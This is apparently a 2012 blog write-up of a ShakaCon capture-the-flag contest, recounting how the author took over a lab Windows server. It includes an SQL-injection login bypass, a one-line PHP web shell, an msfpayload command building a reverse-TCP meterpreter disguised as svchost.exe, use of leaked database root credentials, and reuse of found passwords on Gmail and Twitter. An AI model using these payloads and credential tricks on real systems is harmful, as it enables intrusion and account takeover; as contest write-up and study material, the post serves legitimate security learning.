Thursday, June 28, 2012

ShakaCon 2012 - The writeups

I've finally gotten around to write-ups for ShakaCon 2012.  The server that was set up to be attacked was 192.168.1.129 and the score server (which was hooked up to the projector in the conference) was 192.168.1.122, and we (all the attackers) were on 192.168.1.*

so, here we go:

Challenge 1 and challenge 2 were almost identical.  When you accessed the web root, you were presented with a login form, and the first thing I tried was just SQL injection.
  Admin
  '1==1;
logs you in.  OK, step 1 done.  Next you are presented with a gallery of images and an upload form.  PHP upload vulnerabilities immediately come to mind.  It turns out that there is SOME filtering on the extension, but you can still upload a simple PHP shell with a .php extension:

lol777.php:

  <?php system($_GET['cmd']); ?>
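The login bypass above, as an added illustration of the mechanism (this is not code from the CTF or from the original post): a login check that builds its query by string concatenation, next to the same check parameterized, both run against an in-memory SQLite table.  SQLite stands in for MySQL here and the users table is constructed; the payloads are the classic `' OR '1'='1` tautology and the `Admin'--` comment trick, used to show why concatenation fails, rather than the exact string typed at the con.

```python
import sqlite3


def make_db():
    """Constructed sample users table (assumed schema, not the challenge's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('Admin', 'correct horse battery staple')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Query built by string concatenation, the pattern behind the login bypass.

    Password "' OR '1'='1" turns the WHERE clause into
    (username = 'Admin' AND password = '') OR '1'='1', which is always true;
    username "Admin'--" comments out the password check entirely.
    """
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, username, password):
    """Same check with bound parameters: the quote never reaches the parser."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    for user, pw in [("Admin", "wrong"), ("Admin", "' OR '1'='1"), ("Admin'--", "x")]:
        print(repr(user), repr(pw),
              "vulnerable:", login_vulnerable(db, user, pw),
              "parameterized:", login_parameterized(db, user, pw))
```

Run it and the concatenated version accepts both injected inputs while the parameterized one rejects everything except the real password.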

and this got me a foothold onto the system.  I can run arbitrary commands like this:
  http://192.168.1.129/lol777.php?cmd=DIR /S c:\

Next, build a meterpreter exe:
  msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.108 X > svchost.exe

(192.168.1.108 being my x64 BackTrack VM; note to self: change default passwords before these sorts of things)

next, set up the listening meterpreter session:


then run:
  http://192.168.1.129/lol777.php?cmd=svchost.exe


BOOM [shell] [pwned]

So, with my inner hacker being so lazy, and my inner computer scientist telling me to take the path of optimality: meterpreter has this AWESOME search function that walks the entire hard drive to find files matching a simple wildcard pattern.

BOOM [challenge 1 - PWNED]
BOOM [challenge 2 - PWNED]
BOOM [challenge 5 - PWNED]

Since the web service was running as administrator on the box, I priv. escalated to SYSTEM, migrated to process 604 (the winlogon process), set up persistence, and then popped a VNC session.  I now had a GUI to play with, as well as the command line!

First thing, change the desktop background to something inconspicuous so that the admins wouldn't know they were pwned:
With that done, I have SYSTEM access, full GUI and full meterpreter control of the box.  Pretty much game over, but I was still behind in points.  My main competition (ari) was overwriting the flags faster than I was, so when the clock ticked I was not getting points. My initial (and VERY inelegant) solution was this:
That was a simple loop (forever) that made an HTTP request with curl to overwrite the key file.  No delay.  Just as fast and as hard as possible.

This wasn't a very good solution, because he had built a PHP script (running on the server) to constantly overwrite the key file.  Hmm....I'm almost DoSing the box at this point (hitting both web services), so I need to go for something better:


I created a batch file, and threw it on the desktop and ran it:

@ECHO OFF
REM Loop forever: clear the system and read-only attributes so the redirect
REM can write the key file, drop my handle in, then set the attributes again.
:j
ATTRIB -s key_file
ATTRIB -r key_file
ECHO soen > key_file
ATTRIB +s key_file
ATTRIB +r key_file
goto j

This was remarkably effective.  I closed the point gap quite quickly, but I soon stalled when ari got another service (challenge 3).  DUE TO A KILLED REPORTING PROCESS WE DID NOT CHANGE IN POINT DISTANCE (*cough* *cough*).

But once that was fixed, I started closing in on ari.  He then took the tactic of killing all processes not essential to the system.  And looping it.  So, no cmd.exe; my batch immediately died.

OK

What can I do to combat this?  Well, ari was taking the tactic of remaining outside the system shell (he didn't have a good laptop apparently).  I had full SYSTEM and meterpreter access.  What can I do with that?

WINDOWS ACLS

Using meterpreter I can execute commands as if I were on the command line, so I decided to go the route of using CACLS.EXE to modify permissions on the key files.  The funny thing with Windows: the file's DACL is checked on every access, so even an administrator (which is what the web server was running as) gets access denied if the ACL doesn't grant the right.  You can take away permissions from administrators (essentially); an administrator can still take ownership and rewrite the ACL, but that is a deliberate extra step.  SO, I removed all write access to the file (except for SYSTEM), then overwrote it with my handle (so I would "capture" the flag).  I did this to challenges 1, 2 and 5 (because I could find their keys).

Ari, despite his escalations did not regain control of those flags for the rest of the game.


THIS IS THE STORY OF THOSE OTHER FLAGS

The initial nmap scan of the box turned up 80 [challenge 1], 8080 [challenge 2], 3306 [challenge 3], and 31337 [challenge 5].

So I went in for challenge 3 next.
              3306 == mysql
so I fired up mysqld on a NAT'd VM and then ran mysql...hmmm...root access denied.
I needed to look around and see what I could gather for credentials.  Almost immediately I found a "config.php" file in the webroot, and inside were:

<?php

    $dbhost = '127.0.0.1';
    $dbuser ='root';
    $dbpass ='!@sh4k4c0nctf2012!@';

    $link = mysql_connect($dbhost, $dbuser, $dbpass);
    if(!$link){exit('Server Not Responding.');}

    $db = 'ctf';
    $connect = mysql_select_db($db, $link);
    if (!$connect) {exit('DB Not Responding.');}

?>
Pay dirt.  Super easy.  So I connect in; there's a database called ctf.  Tables are users, info(?), and key.
SELECT * from key;
--cannot perform this operation

Damn.  So at this point I realized that I suck at MySQL esoterica.  I knew I needed to quote that thing out (`key` is a reserved word in MySQL, so the bare table name has to be wrapped in backticks or qualified as ctf.key, which is what the script below does), but BLOODY HELL I tried a ton of stuff that didn't work.  AFTER DROPPING THE TABLE and recreating it, because ari was evil and set the length of one of the fields to 3 (so that my flag, 4 characters, wouldn't go in), I finally got to this little MySQL script:

use ctf;
delete from ctf.key where contents="ari";
delete from ctf.key where contents="soen";
insert into ctf.key (md5,contents) VALUES("c3_de1fce8459e13f3dfee749f30ae15", "soen");
select * from ctf.key;

Updating the key was being a pain, so I took the elegant solution:
perl -e 'while (1) { sleep(1); system("mysql -h 192.168.1.129 -u root --password=\\!\@sh4k4c0nctf2012\\!\@ < update_flag"); }'

yup

Another perl while loop.  I hate myself.  Anyways, that locked the flag down for me.  However, the point skews showed that ari would occasionally get the flag, so I needed to look for how he was doing it.  He cleverly inserted a simple statement into the index.php page in the webroot that everyone was hitting constantly, and it updated the SQL with his username.  I decided such a well-hidden script deserved to stay there, but I swapped our names in the script, so it would capture the flag for me.  After a few minutes of losing point spread, he found it and was nigh-frothing at the lips when he came over and chided me for hacking his scripts.  Lulz.  <3 ari.  ANYWAYS, that wraps it up for challenge #3.

[challenge 4]
There was an entry inside the SQL table that had a username and password.  I tried Gmail.  It worked.  Inside were references to a Twitter account that had been set up.  Logged in to Twitter with the same uid/pw: @pwned_by_soen.  Pointz.

A cool thing I found inside the email account was a bit of (what I first thought was Python) AutoIt script.  This turned out to be the source code to challenge 5.


[challenge 5]
I just realized I lost the source code and my exploit for it.  It was a UDP PHP shell thingy.  Pretty cool, imo.

SO, with all the challenges pwned and scripted, time for [challenge infinity]

or

[scoreserver_hacking]

So:

After poking around, and some chiding from the server admins for killing it, I found the reporting mechanism on the box.  The whole system looked like this:

[192.168.1.129] key_reporter.exe -> [192.168.1.122] score_updater -> POINTS

I looked at the file in IDA.  Packed.  Damn.  Easy enough, though.  I threw it into OllyDbg, set a breakpoint on the PUSHA, and another on the matching POPA (thanks @Danny_Quist (he's kind of a big deal) and the TracerFire 4 malware reversing class for the tips).  I then dumped the binary and ran strings on it.  AutoIt in strings.
/facepalm
/facepalm
/facepalm
/facepalm
[downloaded AutoIT EXE decompiler] -> [source .AU3]

Pretty simple.  There was a delay of 5 seconds at the bottom.  I removed it and ran the script (hoping, since I had pwned all services, I would get a RIDICulous amount of points.  No such luck: the score_updater only ticked once every 10 seconds or something, and if there was no input from key_reporter it just kept the current point spread and added points to it.)

So, I started pulling out the little encryption routine to make a plugin for my SQL mapper.  

AT THIS POINT THE CONTEST ENDED

and since I'm lazy, I didn't finish hacking the score server.  /fat

But I won, so hey, who's complaining?

Grats to ari on second, he had a lot of evil tricks up his sleeve and made the escalation of evilness a ton of fun.  Fun times.

I grabbed the http logs and did a touch of data analysis on them, and this is what it came out to:
IPs sorted by number of queries
('192.168.1.132', 835863)
('192.168.1.111', 22445)
('192.168.1.106', 4287)
('192.168.1.110', 1893)
('192.168.1.137', 1296)
('192.168.1.148', 811)
('127.0.0.1', 577)
('192.168.1.114', 468)
('192.168.1.149', 401)
('192.168.1.141', 271)
('192.168.1.147', 177)
('192.168.1.100', 100)
('192.168.1.124', 82)
('169.254.203.92', 39)
('169.254.119.122', 31)
('192.168.1.144', 22)
('192.168.1.2', 13)
('192.168.1.142', 6)
('192.168.1.140', 4)
('192.168.1.108', 4)
('192.168.1.112', 4)
('', 1)
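The per-IP ranking above reads like the output of a Python Counter over the web server's access log.  As an added example (not the author's script), here is a parser for Apache-style common-log-format lines that produces the same kind of (ip, count) ranking, busiest first.  The log format is assumed and the sample lines are constructed for the example; lines that don't match the format land in an empty-string bucket, mirroring the `('', 1)` entry above.

```python
import re
from collections import Counter

# Apache/XAMPP common log format: the client address is the first field.
# This format is an assumption; the real ShakaCon logs are not reproduced here.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[^"]*" \d{3} \S+')

# Constructed sample lines, including one that doesn't parse at all.
SAMPLE_LOG = """\
192.168.1.132 - - [28/Jun/2012:10:00:01 -1000] "GET /index.php HTTP/1.1" 200 512
192.168.1.132 - - [28/Jun/2012:10:00:01 -1000] "GET /index.php HTTP/1.1" 200 512
192.168.1.108 - - [28/Jun/2012:10:00:02 -1000] "GET /lol777.php?cmd=dir HTTP/1.1" 200 9231
192.168.1.132 - - [28/Jun/2012:10:00:02 -1000] "GET /index.php HTTP/1.1" 200 512
127.0.0.1 - - [28/Jun/2012:10:00:03 -1000] "GET /key_file HTTP/1.1" 200 5
this line is garbage and has no client address
"""


def count_clients(lines):
    """Count requests per client IP; unparseable lines are counted under ''."""
    counts = Counter()
    for line in lines:
        line = line.rstrip("\r\n")
        if not line:
            continue
        m = LOG_LINE.match(line)
        counts[m.group(1) if m else ""] += 1
    return counts


def rank_clients(lines):
    """Return a list of (ip, count) tuples, most requests first, ties by IP."""
    return sorted(count_clients(lines).items(), key=lambda kv: (-kv[1], kv[0]))


def rank_log_file(path):
    """Rank the clients in an access log on disk (streams the file line by line)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return rank_clients(fh)


if __name__ == "__main__":
    print("IPs sorted by number of queries")
    for entry in rank_clients(SAMPLE_LOG.splitlines()):
        print(entry)
```

Point `rank_log_file` at a real access log and a tight `while(1)` flag-overwrite loop shows up immediately as an address with a request count orders of magnitude above everyone else's.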

I was pretty happy about the 4 coming from my VM (*.108), but just take a GUESS at whose computer was *.132

all those damn while(1){HIT THE SERVER WITH A HAMMER} loops


FINAL SCORE:

Look at that point spread....mhmmyeahhhh.

/flex


Thanks S-DNA guys for putting it on.  I appreciate it a ton!

Mahalo,
